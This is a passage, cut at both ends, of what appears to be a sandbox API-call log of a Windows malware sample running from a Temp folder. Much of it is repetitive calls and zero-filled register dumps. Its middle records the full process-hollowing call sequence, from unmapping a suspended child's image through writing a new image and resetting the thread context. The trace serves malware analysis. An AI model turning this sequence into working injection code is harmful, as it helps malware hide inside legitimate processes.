nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0116.181] VirtualProtect (in: lpAddress=0x1634d0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0116.182] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0116.182] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0116.182] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0116.182] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0116.183] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0116.183] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0116.183] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0116.183] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0116.183] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0116.184] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0116.184] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0116.184] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0116.333] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x90138 [0116.549] PostMessageA (hWnd=0x90138, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0116.549] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0116.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x3d0000 [0116.549] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3d0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0116.549] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0116.549] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xe5c, dwThreadId=0xe60)) returned 1 [0116.551] VirtualFree (lpAddress=0x3d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0116.551] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x3d0000 [0116.551] GetThreadContext (in: hThread=0x48, lpContext=0x3d0000 | out: lpContext=0x3d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0116.648] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdc008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0116.649] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0116.649] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0116.649] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x164770*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x164770*, lpNumberOfBytesWritten=0x0) returned 1 [0116.650] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x164b70, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0116.650] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x164b70*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x164b70*, lpNumberOfBytesWritten=0x0) returned 1 [0116.656] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1b9170*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b9170*, lpNumberOfBytesWritten=0x0) returned 1 [0116.657] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdc008, lpBuffer=0x1648a4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1648a4*, lpNumberOfBytesWritten=0x0) returned 1 [0116.657] SetThreadContext (hThread=0x48, lpContext=0x3d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, 